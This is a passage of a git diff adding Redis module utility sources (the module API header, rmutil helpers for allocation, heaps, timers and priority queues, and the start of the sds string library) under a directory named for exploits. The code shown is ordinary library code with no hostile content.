REDISMODULE_API_FUNC(RedisModule_SetDisconnectCallback)(RedisModuleBlockedClient *bc, RedisModuleDisconnectFunc callback); +void REDISMODULE_API_FUNC(RedisModule_SetClusterFlags)(RedisModuleCtx *ctx, uint64_t flags); +#endif + +/* This is included inline inside each Redis module. */ +static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) __attribute__((unused)); +static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) { + void *getapifuncptr = ((void**)ctx)[0]; + RedisModule_GetApi = (int (*)(const char *, void *)) (unsigned long)getapifuncptr; + REDISMODULE_GET_API(Alloc); + REDISMODULE_GET_API(Calloc); + REDISMODULE_GET_API(Free); + REDISMODULE_GET_API(Realloc); + REDISMODULE_GET_API(Strdup); + REDISMODULE_GET_API(CreateCommand); + REDISMODULE_GET_API(SetModuleAttribs); + REDISMODULE_GET_API(IsModuleNameBusy); + REDISMODULE_GET_API(WrongArity); + REDISMODULE_GET_API(ReplyWithLongLong); + REDISMODULE_GET_API(ReplyWithError); + REDISMODULE_GET_API(ReplyWithSimpleString); + REDISMODULE_GET_API(ReplyWithArray); + REDISMODULE_GET_API(ReplySetArrayLength); + REDISMODULE_GET_API(ReplyWithStringBuffer); + REDISMODULE_GET_API(ReplyWithString); + REDISMODULE_GET_API(ReplyWithNull); + REDISMODULE_GET_API(ReplyWithCallReply); + REDISMODULE_GET_API(ReplyWithDouble); + REDISMODULE_GET_API(ReplySetArrayLength); + REDISMODULE_GET_API(GetSelectedDb); + REDISMODULE_GET_API(SelectDb); + REDISMODULE_GET_API(OpenKey); + REDISMODULE_GET_API(CloseKey); + REDISMODULE_GET_API(KeyType); + REDISMODULE_GET_API(ValueLength); + REDISMODULE_GET_API(ListPush); + REDISMODULE_GET_API(ListPop); + REDISMODULE_GET_API(StringToLongLong); + REDISMODULE_GET_API(StringToDouble); + REDISMODULE_GET_API(Call); + REDISMODULE_GET_API(CallReplyProto); + REDISMODULE_GET_API(FreeCallReply); + REDISMODULE_GET_API(CallReplyInteger); + REDISMODULE_GET_API(CallReplyType); + REDISMODULE_GET_API(CallReplyLength); + REDISMODULE_GET_API(CallReplyArrayElement); + REDISMODULE_GET_API(CallReplyStringPtr); + REDISMODULE_GET_API(CreateStringFromCallReply); + REDISMODULE_GET_API(CreateString); + REDISMODULE_GET_API(CreateStringFromLongLong); + REDISMODULE_GET_API(CreateStringFromString); + REDISMODULE_GET_API(CreateStringPrintf); + REDISMODULE_GET_API(FreeString); + REDISMODULE_GET_API(StringPtrLen); + REDISMODULE_GET_API(AutoMemory); + REDISMODULE_GET_API(Replicate); + REDISMODULE_GET_API(ReplicateVerbatim); + REDISMODULE_GET_API(DeleteKey); + REDISMODULE_GET_API(UnlinkKey); + REDISMODULE_GET_API(StringSet); + REDISMODULE_GET_API(StringDMA); + REDISMODULE_GET_API(StringTruncate); + REDISMODULE_GET_API(GetExpire); + REDISMODULE_GET_API(SetExpire); + REDISMODULE_GET_API(ZsetAdd); + REDISMODULE_GET_API(ZsetIncrby); + REDISMODULE_GET_API(ZsetScore); + REDISMODULE_GET_API(ZsetRem); + REDISMODULE_GET_API(ZsetRangeStop); + REDISMODULE_GET_API(ZsetFirstInScoreRange); + REDISMODULE_GET_API(ZsetLastInScoreRange); + REDISMODULE_GET_API(ZsetFirstInLexRange); + REDISMODULE_GET_API(ZsetLastInLexRange); + REDISMODULE_GET_API(ZsetRangeCurrentElement); + REDISMODULE_GET_API(ZsetRangeNext); + REDISMODULE_GET_API(ZsetRangePrev); + REDISMODULE_GET_API(ZsetRangeEndReached); + REDISMODULE_GET_API(HashSet); + REDISMODULE_GET_API(HashGet); + REDISMODULE_GET_API(IsKeysPositionRequest); + REDISMODULE_GET_API(KeyAtPos); + REDISMODULE_GET_API(GetClientId); + REDISMODULE_GET_API(GetContextFlags); + REDISMODULE_GET_API(PoolAlloc); + REDISMODULE_GET_API(CreateDataType); + REDISMODULE_GET_API(ModuleTypeSetValue); + REDISMODULE_GET_API(ModuleTypeGetType); + REDISMODULE_GET_API(ModuleTypeGetValue); + REDISMODULE_GET_API(SaveUnsigned); + REDISMODULE_GET_API(LoadUnsigned); + REDISMODULE_GET_API(SaveSigned); + REDISMODULE_GET_API(LoadSigned); + REDISMODULE_GET_API(SaveString); + REDISMODULE_GET_API(SaveStringBuffer); + REDISMODULE_GET_API(LoadString); + REDISMODULE_GET_API(LoadStringBuffer); + REDISMODULE_GET_API(SaveDouble); + REDISMODULE_GET_API(LoadDouble); + REDISMODULE_GET_API(SaveFloat); + REDISMODULE_GET_API(LoadFloat); + REDISMODULE_GET_API(EmitAOF); + REDISMODULE_GET_API(Log); + REDISMODULE_GET_API(LogIOError); + REDISMODULE_GET_API(StringAppendBuffer); + REDISMODULE_GET_API(RetainString); + REDISMODULE_GET_API(StringCompare); + REDISMODULE_GET_API(GetContextFromIO); + REDISMODULE_GET_API(Milliseconds); + REDISMODULE_GET_API(DigestAddStringBuffer); + REDISMODULE_GET_API(DigestAddLongLong); + REDISMODULE_GET_API(DigestEndSequence); + REDISMODULE_GET_API(CreateDict); + REDISMODULE_GET_API(FreeDict); + REDISMODULE_GET_API(DictSize); + REDISMODULE_GET_API(DictSetC); + REDISMODULE_GET_API(DictReplaceC); + REDISMODULE_GET_API(DictSet); + REDISMODULE_GET_API(DictReplace); + REDISMODULE_GET_API(DictGetC); + REDISMODULE_GET_API(DictGet); + REDISMODULE_GET_API(DictDelC); + REDISMODULE_GET_API(DictDel); + REDISMODULE_GET_API(DictIteratorStartC); + REDISMODULE_GET_API(DictIteratorStart); + REDISMODULE_GET_API(DictIteratorStop); + REDISMODULE_GET_API(DictIteratorReseekC); + REDISMODULE_GET_API(DictIteratorReseek); + REDISMODULE_GET_API(DictNextC); + REDISMODULE_GET_API(DictPrevC); + REDISMODULE_GET_API(DictNext); + REDISMODULE_GET_API(DictPrev); + REDISMODULE_GET_API(DictCompare); + REDISMODULE_GET_API(DictCompareC); + +#ifdef REDISMODULE_EXPERIMENTAL_API + REDISMODULE_GET_API(GetThreadSafeContext); + REDISMODULE_GET_API(FreeThreadSafeContext); + REDISMODULE_GET_API(ThreadSafeContextLock); + REDISMODULE_GET_API(ThreadSafeContextUnlock); + REDISMODULE_GET_API(BlockClient); + REDISMODULE_GET_API(UnblockClient); + REDISMODULE_GET_API(IsBlockedReplyRequest); + REDISMODULE_GET_API(IsBlockedTimeoutRequest); + REDISMODULE_GET_API(GetBlockedClientPrivateData); + REDISMODULE_GET_API(GetBlockedClientHandle); + REDISMODULE_GET_API(AbortBlock); + REDISMODULE_GET_API(SetDisconnectCallback); + REDISMODULE_GET_API(SubscribeToKeyspaceEvents); + REDISMODULE_GET_API(BlockedClientDisconnected); + REDISMODULE_GET_API(RegisterClusterMessageReceiver); + REDISMODULE_GET_API(SendClusterMessage); + REDISMODULE_GET_API(GetClusterNodeInfo); + REDISMODULE_GET_API(GetClusterNodesList); + REDISMODULE_GET_API(FreeClusterNodesList); + REDISMODULE_GET_API(CreateTimer); + REDISMODULE_GET_API(StopTimer); + REDISMODULE_GET_API(GetTimerInfo); + REDISMODULE_GET_API(GetMyClusterID); + REDISMODULE_GET_API(GetClusterSize); + REDISMODULE_GET_API(GetRandomBytes); + REDISMODULE_GET_API(GetRandomHexChars); + REDISMODULE_GET_API(SetClusterFlags); +#endif + + if (RedisModule_IsModuleNameBusy && RedisModule_IsModuleNameBusy(name)) return REDISMODULE_ERR; + RedisModule_SetModuleAttribs(ctx,name,ver,apiver); + return REDISMODULE_OK; +} + +#else + +/* Things only defined for the modules core, not exported to modules + * including this file. */ +#define RedisModuleString robj + +#endif /* REDISMODULE_CORE */ +#endif /* REDISMOUDLE_H */ \ No newline at end of file diff --git a/data/exploits/redis/rmutil/Makefile b/data/exploits/redis/rmutil/Makefile new file mode 100644 index 000000000000..09e023b9c943 --- /dev/null +++ b/data/exploits/redis/rmutil/Makefile @@ -0,0 +1,31 @@ +# set environment variable RM_INCLUDE_DIR to the location of redismodule.h +ifndef RM_INCLUDE_DIR + RM_INCLUDE_DIR=../ +endif + +CFLAGS ?= -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function +CFLAGS += -I$(RM_INCLUDE_DIR) +CC=gcc + +OBJS=util.o strings.o sds.o vector.o alloc.o periodic.o + +all: librmutil.a + +clean: + rm -rf *.o *.a + +librmutil.a: $(OBJS) + ar rcs $@ $^ + +test_vector: test_vector.o vector.o + $(CC) -Wall -o $@ $^ -lc -lpthread -O0 + @(sh -c ./$@) +.PHONY: test_vector + +test_periodic: test_periodic.o periodic.o + $(CC) -Wall -o $@ $^ -lc -lpthread -O0 + @(sh -c ./$@) +.PHONY: test_periodic + +test: test_periodic test_vector +.PHONY: test diff --git a/data/exploits/redis/rmutil/alloc.c b/data/exploits/redis/rmutil/alloc.c new file mode 100644 index 000000000000..6eee8052053a --- /dev/null +++ b/data/exploits/redis/rmutil/alloc.c @@ -0,0 +1,32 @@ +#include +#include +#include +#include "alloc.h" + +/* A patched implementation of strdup that will use our patched calloc */ +char *rmalloc_strndup(const char *s, size_t n) { + char *ret = calloc(n + 1, sizeof(char)); + if (ret) + memcpy(ret, s, n); + return ret; +} + +/* + * Re-patching RedisModule_Alloc and friends to the original malloc functions + * + * This function should be called if you are working with malloc-patched code + * outside of redis, usually for unit tests. Call it once when entering your unit + * tests' main(). + * + * Since including "alloc.h" while defining REDIS_MODULE_TARGET + * replaces all malloc functions in redis with the RM_Alloc family of functions, + * when running that code outside of redis, your app will crash. This function + * patches the RM_Alloc functions back to the original mallocs. */ +void RMUTil_InitAlloc() { + + RedisModule_Alloc = malloc; + RedisModule_Realloc = realloc; + RedisModule_Calloc = calloc; + RedisModule_Free = free; + RedisModule_Strdup = strdup; +} diff --git a/data/exploits/redis/rmutil/alloc.h b/data/exploits/redis/rmutil/alloc.h new file mode 100644 index 000000000000..050ff726ce77 --- /dev/null +++ b/data/exploits/redis/rmutil/alloc.h @@ -0,0 +1,51 @@ +#ifndef __RMUTIL_ALLOC__ +#define __RMUTIL_ALLOC__ + +/* Automatic Redis Module Allocation functions monkey-patching. + * + * Including this file while REDIS_MODULE_TARGET is defined, will explicitly + * override malloc, calloc, realloc & free with RedisModule_Alloc, + * RedisModule_Callc, etc implementations, that allow Redis better control and + * reporting over allocations per module. + * + * You should include this file in all c files AS THE LAST INCLUDED FILE + * + * This only has effect when when compiling with the macro REDIS_MODULE_TARGET + * defined. The idea is that for unit tests it will not be defined, but for the + * module build target it will be. + * + */ + +#include +#include + +char *rmalloc_strndup(const char *s, size_t n); + +#ifdef REDIS_MODULE_TARGET /* Set this when compiling your code as a module */ + +#define malloc(size) RedisModule_Alloc(size) +#define calloc(count, size) RedisModule_Calloc(count, size) +#define realloc(ptr, size) RedisModule_Realloc(ptr, size) +#define free(ptr) RedisModule_Free(ptr) + +#ifdef strdup +#undef strdup +#endif +#define strdup(ptr) RedisModule_Strdup(ptr) + +/* More overriding */ +// needed to avoid calling strndup->malloc +#ifdef strndup +#undef strndup +#endif +#define strndup(s, n) rmalloc_strndup(s, n) + +#else + +#endif /* REDIS_MODULE_TARGET */ +/* This function should be called if you are working with malloc-patched code + * outside of redis, usually for unit tests. Call it once when entering your unit + * tests' main() */ +void RMUTil_InitAlloc(); + +#endif /* __RMUTIL_ALLOC__ */ diff --git a/data/exploits/redis/rmutil/heap.c b/data/exploits/redis/rmutil/heap.c new file mode 100644 index 000000000000..fd1fffb73ced --- /dev/null +++ b/data/exploits/redis/rmutil/heap.c @@ -0,0 +1,107 @@ +#include "heap.h" + +/* Byte-wise swap two items of size SIZE. */ +#define SWAP(a, b, size) \ + do \ + { \ + register size_t __size = (size); \ + register char *__a = (a), *__b = (b); \ + do \ + { \ + char __tmp = *__a; \ + *__a++ = *__b; \ + *__b++ = __tmp; \ + } while (--__size > 0); \ + } while (0) + +inline char *__vector_GetPtr(Vector *v, size_t pos) { + return v->data + (pos * v->elemSize); +} + +void __sift_up(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) { + size_t len = last - first; + if (len > 1) { + len = (len - 2) / 2; + size_t ptr = first + len; + if (cmp(__vector_GetPtr(v, ptr), __vector_GetPtr(v, --last)) < 0) { + char t[v->elemSize]; + memcpy(t, __vector_GetPtr(v, last), v->elemSize); + do { + memcpy(__vector_GetPtr(v, last), __vector_GetPtr(v, ptr), v->elemSize); + last = ptr; + if (len == 0) + break; + len = (len - 1) / 2; + ptr = first + len; + } while (cmp(__vector_GetPtr(v, ptr), t) < 0); + memcpy(__vector_GetPtr(v, last), t, v->elemSize); + } + } +} + +void __sift_down(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *), size_t start) { + // left-child of __start is at 2 * __start + 1 + // right-child of __start is at 2 * __start + 2 + size_t len = last - first; + size_t child = start - first; + + if (len < 2 || (len - 2) / 2 < child) + return; + + child = 2 * child + 1; + + if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) { + // right-child exists and is greater than left-child + ++child; + } + + // check if we are in heap-order + if (cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, start)) < 0) + // we are, __start is larger than it's largest child + return; + + char top[v->elemSize]; + memcpy(top, __vector_GetPtr(v, start), v->elemSize); + do { + // we are not in heap-order, swap the parent with it's largest child + memcpy(__vector_GetPtr(v, start), __vector_GetPtr(v, first + child), v->elemSize); + start = first + child; + + if ((len - 2) / 2 < child) + break; + + // recompute the child based off of the updated parent + child = 2 * child + 1; + + if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) { + // right-child exists and is greater than left-child + ++child; + } + + // check if we are in heap-order + } while (cmp(__vector_GetPtr(v, first + child), top) >= 0); + memcpy(__vector_GetPtr(v, start), top, v->elemSize); +} + + +void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) { + if (last - first > 1) { + // start from the first parent, there is no need to consider children + for (int start = (last - first - 2) / 2; start >= 0; --start) { + __sift_down(v, first, last, cmp, first + start); + } + } +} + + +inline void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) { + __sift_up(v, first, last, cmp); +} + + +inline void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) { + if (last - first > 1) { + SWAP(__vector_GetPtr(v, first), __vector_GetPtr(v, --last), v->elemSize); + __sift_down(v, first, last, cmp, first); + } +} diff --git a/data/exploits/redis/rmutil/heap.h b/data/exploits/redis/rmutil/heap.h new file mode 100644 index 000000000000..b49efce33d9d --- /dev/null +++ b/data/exploits/redis/rmutil/heap.h @@ -0,0 +1,38 @@ +#ifndef __HEAP_H__ +#define __HEAP_H__ + +#include "vector.h" + + +/* Make heap from range + * Rearranges the elements in the range [first,last) in such a way that they form a heap. + * A heap is a way to organize the elements of a range that allows for fast retrieval of the element with the highest + * value at any moment (with pop_heap), even repeatedly, while allowing for fast insertion of new elements (with + * push_heap). + * The element with the highest value is always pointed by first. The order of the other elements depends on the + * particular implementation, but it is consistent throughout all heap-related functions of this header. + * The elements are compared using cmp. + */ +void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)); + + +/* Push element into heap range + * Given a heap in the range [first,last-1), this function extends the range considered a heap to [first,last) by + * placing the value in (last-1) into its corresponding location within it. + * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements + * are added and removed from it using push_heap and pop_heap, respectively. + */ +void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)); + + +/* Pop element from heap range + * Rearranges the elements in the heap range [first,last) in such a way that the part considered a heap is shortened + * by one: The element with the highest value is moved to (last-1). + * While the element with the highest value is moved from first to (last-1) (which now is out of the heap), the other + * elements are reorganized in such a way that the range [first,last-1) preserves the properties of a heap. + * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements + * are added and removed from it using push_heap and pop_heap, respectively. + */ +void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)); + +#endif //__HEAP_H__ diff --git a/data/exploits/redis/rmutil/logging.h b/data/exploits/redis/rmutil/logging.h new file mode 100644 index 000000000000..ed92cb326500 --- /dev/null +++ b/data/exploits/redis/rmutil/logging.h @@ -0,0 +1,11 @@ +#ifndef __RMUTIL_LOGGING_H__ +#define __RMUTIL_LOGGING_H__ + +/* Convenience macros for redis logging */ + +#define RM_LOG_DEBUG(ctx, ...) RedisModule_Log(ctx, "debug", __VA_ARGS__) +#define RM_LOG_VERBOSE(ctx, ...) RedisModule_Log(ctx, "verbose", __VA_ARGS__) +#define RM_LOG_NOTICE(ctx, ...) RedisModule_Log(ctx, "notice", __VA_ARGS__) +#define RM_LOG_WARNING(ctx, ...) RedisModule_Log(ctx, "warning", __VA_ARGS__) + +#endif \ No newline at end of file diff --git a/data/exploits/redis/rmutil/periodic.c b/data/exploits/redis/rmutil/periodic.c new file mode 100644 index 000000000000..dbddcebddc61 --- /dev/null +++ b/data/exploits/redis/rmutil/periodic.c @@ -0,0 +1,88 @@ +#define REDISMODULE_EXPERIMENTAL_API +#include "periodic.h" +#include +#include +#include + +typedef struct RMUtilTimer { + RMutilTimerFunc cb; + RMUtilTimerTerminationFunc onTerm; + void *privdata; + struct timespec interval; + pthread_t thread; + pthread_mutex_t lock; + pthread_cond_t cond; +} RMUtilTimer; + +static struct timespec timespecAdd(struct timespec *a, struct timespec *b) { + struct timespec ret; + ret.tv_sec = a->tv_sec + b->tv_sec; + + long long ns = a->tv_nsec + b->tv_nsec; + ret.tv_sec += ns / 1000000000; + ret.tv_nsec = ns % 1000000000; + return ret; +} + +static void *rmutilTimer_Loop(void *ctx) { + RMUtilTimer *tm = ctx; + + int rc = ETIMEDOUT; + struct timespec ts; + + pthread_mutex_lock(&tm->lock); + while (rc != 0) { + clock_gettime(CLOCK_REALTIME, &ts); + struct timespec timeout = timespecAdd(&ts, &tm->interval); + if ((rc = pthread_cond_timedwait(&tm->cond, &tm->lock, &timeout)) == ETIMEDOUT) { + + // Create a thread safe context if we're running inside redis + RedisModuleCtx *rctx = NULL; + if (RedisModule_GetThreadSafeContext) rctx = RedisModule_GetThreadSafeContext(NULL); + + // call our callback... + tm->cb(rctx, tm->privdata); + + // If needed - free the thread safe context. + // It's up to the user to decide whether automemory is active there + if (rctx) RedisModule_FreeThreadSafeContext(rctx); + } + if (rc == EINVAL) { + perror("Error waiting for condition"); + break; + } + } + + // call the termination callback if needed + if (tm->onTerm != NULL) { + tm->onTerm(tm->privdata); + } + + // free resources associated with the timer + pthread_cond_destroy(&tm->cond); + free(tm); + + return NULL; +} + +/* set a new frequency for the timer. This will take effect AFTER the next trigger */ +void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval) { + t->interval = newInterval; +} + +RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm, + void *privdata, struct timespec interval) { + RMUtilTimer *ret = malloc(sizeof(*ret)); + *ret = (RMUtilTimer){ + .privdata = privdata, .interval = interval, .cb = cb, .onTerm = onTerm, + }; + pthread_cond_init(&ret->cond, NULL); + pthread_mutex_init(&ret->lock, NULL); + + pthread_create(&ret->thread, NULL, rmutilTimer_Loop, ret); + return ret; +} + +int RMUtilTimer_Terminate(struct RMUtilTimer *t) { + return pthread_cond_signal(&t->cond); +} diff --git a/data/exploits/redis/rmutil/periodic.h b/data/exploits/redis/rmutil/periodic.h new file mode 100644 index 000000000000..674007216a0b --- /dev/null +++ b/data/exploits/redis/rmutil/periodic.h @@ -0,0 +1,46 @@ +#ifndef RMUTIL_PERIODIC_H_ +#define RMUTIL_PERIODIC_H_ +#include +#include + +/** periodic.h - Utility periodic timer running a task repeatedly every given time interval */ + +/* RMUtilTimer - opaque context for the timer */ +struct RMUtilTimer; + +/* RMutilTimerFunc - callback type for timer tasks. The ctx is a thread-safe redis module context + * that should be locked/unlocked by the callback when running stuff against redis. privdata is + * pre-existing private data */ +typedef void (*RMutilTimerFunc)(RedisModuleCtx *ctx, void *privdata); + +typedef void (*RMUtilTimerTerminationFunc)(void *privdata); + +/* Create and start a new periodic timer. Each timer has its own thread and can only be run and + * stopped once. The timer runs `cb` every `interval` with `privdata` passed to the callback. */ +struct RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm, + void *privdata, struct timespec interval); + +/* set a new frequency for the timer. This will take effect AFTER the next trigger */ +void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval); + +/* Stop the timer loop, call the termination callbck to free up any resources linked to the timer, + * and free the timer after stopping. + * + * This function doesn't wait for the thread to terminate, as it may cause a race condition if the + * timer's callback is waiting for the redis global lock. + * Instead you should make sure any resources are freed by the callback after the thread loop is + * finished. + * + * The timer is freed automatically, so the callback doesn't need to do anything about it. + * The callback gets the timer's associated privdata as its argument. + * + * If no callback is specified we do not free up privdata. If privdata is NULL we still call the + * callback, as it may log stuff or free global resources. + */ +int RMUtilTimer_Terminate(struct RMUtilTimer *t); + +/* DEPRECATED - do not use this function (well now you can't), use terminate instead + Free the timer context. The caller should be responsible for freeing the private data at this + * point */ +// void RMUtilTimer_Free(struct RMUtilTimer *t); +#endif \ No newline at end of file diff --git a/data/exploits/redis/rmutil/priority_queue.c b/data/exploits/redis/rmutil/priority_queue.c new file mode 100644 index 000000000000..5c16c0878512 --- /dev/null +++ b/data/exploits/redis/rmutil/priority_queue.c @@ -0,0 +1,36 @@ +#include "priority_queue.h" +#include "heap.h" + +PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *)) { + PriorityQueue *pq = malloc(sizeof(PriorityQueue)); + pq->v = __newVectorSize(elemSize, cap); + pq->cmp = cmp; + return pq; +} + +inline size_t Priority_Queue_Size(PriorityQueue *pq) { + return Vector_Size(pq->v); +} + +inline int Priority_Queue_Top(PriorityQueue *pq, void *ptr) { + return Vector_Get(pq->v, 0, ptr); +} + +inline size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem) { + size_t top = __vector_PushPtr(pq->v, elem); + Heap_Push(pq->v, 0, top, pq->cmp); + return top; +} + +inline void Priority_Queue_Pop(PriorityQueue *pq) { + if (pq->v->top == 0) { + return; + } + Heap_Pop(pq->v, 0, pq->v->top, pq->cmp); + pq->v->top--; +} + +void Priority_Queue_Free(PriorityQueue *pq) { + Vector_Free(pq->v); + free(pq); +} diff --git a/data/exploits/redis/rmutil/priority_queue.h b/data/exploits/redis/rmutil/priority_queue.h new file mode 100644 index 000000000000..89f8c731aa6a --- /dev/null +++ b/data/exploits/redis/rmutil/priority_queue.h @@ -0,0 +1,55 @@ +#ifndef __PRIORITY_QUEUE_H__ +#define __PRIORITY_QUEUE_H__ + +#include "vector.h" + +/* Priority queue + * Priority queues are designed such that its first element is always the greatest of the elements it contains. + * This context is similar to a heap, where elements can be inserted at any moment, and only the max heap element can be + * retrieved (the one at the top in the priority queue). + * Priority queues are implemented as Vectors. Elements are popped from the "back" of Vector, which is known as the top + * of the priority queue. + */ +typedef struct { + Vector *v; + + int (*cmp)(void *, void *); +} PriorityQueue; + +/* Construct priority queue + * Constructs a priority_queue container adaptor object. + */ +PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *)); + +#define NewPriorityQueue(type, cap, cmp) __newPriorityQueueSize(sizeof(type), cap, cmp) + +/* Return size + * Returns the number of elements in the priority_queue. + */ +size_t Priority_Queue_Size(PriorityQueue *pq); + +/* Access top element + * Copy the top element in the priority_queue to ptr. + * The top element is the element that compares higher in the priority_queue. + */ +int Priority_Queue_Top(PriorityQueue *pq, void *ptr); + +/* Insert element + * Inserts a new element in the priority_queue. + */ +size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem); + +#define Priority_Queue_Push(pq, elem) __priority_Queue_PushPtr(pq, &(typeof(elem)){elem}) + +/* Remove top element + * Removes the element on top of the priority_queue, effectively reducing its size by one. The element removed is the + * one with the highest value. + * The value of this element can be retrieved before being popped by calling Priority_Queue_Top. + */ +void Priority_Queue_Pop(PriorityQueue *pq); + +/* free the priority queue and the underlying data. Does not release its elements if + * they are pointers */ +void Priority_Queue_Free(PriorityQueue *pq); + +#endif //__PRIORITY_QUEUE_H__ diff --git a/data/exploits/redis/rmutil/sds.c b/data/exploits/redis/rmutil/sds.c new file mode 100644 index 000000000000..e3dd67352fc0 --- /dev/null +++ b/data/exploits/redis/rmutil/sds.c @@ -0,0 +1,1274 @@ +/* SDSLib 2.0 -- A C dynamic strings library + * + * Copyright (c) 2006-2015, Salvatore Sanfilippo + * Copyright (c) 2015, Oran Agra + * Copyright (c) 2015, Redis Labs, Inc + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * * Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * * Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * * Neither the name of Redis nor the names of its contributors may be used + * to endorse or promote products derived from this software without + * specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE. + */ + +#include +#include +#include +#include +#include +#include "sds.h" +#include "sdsalloc.h" + +static inline int sdsHdrSize(char type) { + switch(type&SDS_TYPE_MASK) { + case SDS_TYPE_5: + return sizeof(struct sdshdr5); + case SDS_TYPE_8: + return sizeof(struct sdshdr8); + case SDS_TYPE_16: + return sizeof(struct sdshdr16); + case SDS_TYPE_32: + return sizeof(struct sdshdr32); + case SDS_TYPE_64: + return sizeof(struct sdshdr64); + } + return 0; +} + +static inline char sdsReqType(size_t string_size) { + if (string_size < 32) + return SDS_TYPE_5; + if (string_size < 0xff) + return SDS_TYPE_8; + if (string_size < 0xffff) + return SDS_TYPE_16; + if (string_size < 0xffffffff) + return SDS_TYPE_32; + return SDS_TYPE_64; +} + +/* Create a new sds string with the content specified by the 'init' pointer + * and 'initlen'. + * If NULL is used for 'init' the string is initialized with zero bytes. + * + * The string is always null-termined (all the sds strings are, always) so + * even if you create an sds string with: + * + * mystring = sdsnewlen("abc",3); + * + * You can print the string with printf() as there is an implicit \0 at the + * end of the string. However the string is binary safe and can contain + * \0 characters in the middle, as the length is stored in the sds header. */ +sds sdsnewlen(const void *init, size_t initlen) { + void *sh; + sds s; + char type = sdsReqType(initlen); + /* Empty strings are usually created in order to append. Use type 8 + * since type 5 is not good at this. */ + if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8; + int hdrlen = sdsHdrSize(type); + unsigned char *fp; /* flags pointer. */ + + sh = s_malloc(hdrlen+initlen+1); + if (!init) + memset(sh, 0, hdrlen+initlen+1); + if (sh == NULL) return NULL; + s = (char*)sh+hdrlen; + fp = ((unsigned char*)s)-1; + switch(type) { + case SDS_TYPE_5: { + *fp = type | (initlen << SDS_TYPE_BITS); + break; + } + case SDS_TYPE_8: { + SDS_HDR_VAR(8,s); + sh->len = initlen; + sh->alloc = initlen; + *fp = type; + break; + } + case SDS_TYPE_16: { + SDS_HDR_VAR(16,s); + sh->len = initlen; + sh->alloc = initlen; + *fp = type; + break; + } + case SDS_TYPE_32: { + SDS_HDR_VAR(32,s); + sh->len = initlen; + sh->alloc = initlen; + *fp = type; + break; + } + case SDS_TYPE_64: { + SDS_HDR_VAR(64,s); + sh->len = initlen; + sh->alloc = initlen; + *fp = type; + break; + } + } + if (initlen && init) + memcpy(s, init, initlen); + s[initlen] = '\0'; + return s; +} + +/* Create an empty (zero length) sds string. Even in this case the string + * always has an implicit null term. */ +sds sdsempty(void) { + return sdsnewlen("",0); +} + +/* Create a new sds string starting from a null terminated C string. */ +sds sdsnew(const char *init) { + size_t initlen = (init == NULL) ? 0 : strlen(init); + return sdsnewlen(init, initlen); +} + +/* Duplicate an sds string. */ +sds sdsdup(const sds s) { + return sdsnewlen(s, sdslen(s)); +} + +/* Free an sds string. No operation is performed if 's' is NULL. */ +void sdsfree(sds s) { + if (s == NULL) return; + s_free((char*)s-sdsHdrSize(s[-1])); +} + +/* Set the sds string length to the length as obtained with strlen(), so + * considering as content only up to the first null term character. + * + * This function is useful when the sds string is hacked manually in some + * way, like in the following example: + * + * s = sdsnew("foobar"); + * s[2] = '\0'; + * sdsupdatelen(s); + * printf("%d\n", sdslen(s)); + * + * The output will be "2", but if we comment out the call to sdsupdatelen() + * the output will be "6" as the string was modified but the logical length + * remains 6 bytes. */ +void sdsupdatelen(sds s) { + int reallen = strlen(s); + sdssetlen(s, reallen); +} + +/* Modify an sds string in-place to make it empty (zero length). + * However all the existing buffer is not discarded but set as free space + * so that next append operations will not require allocations up to the + * number of bytes previously available. */ +void 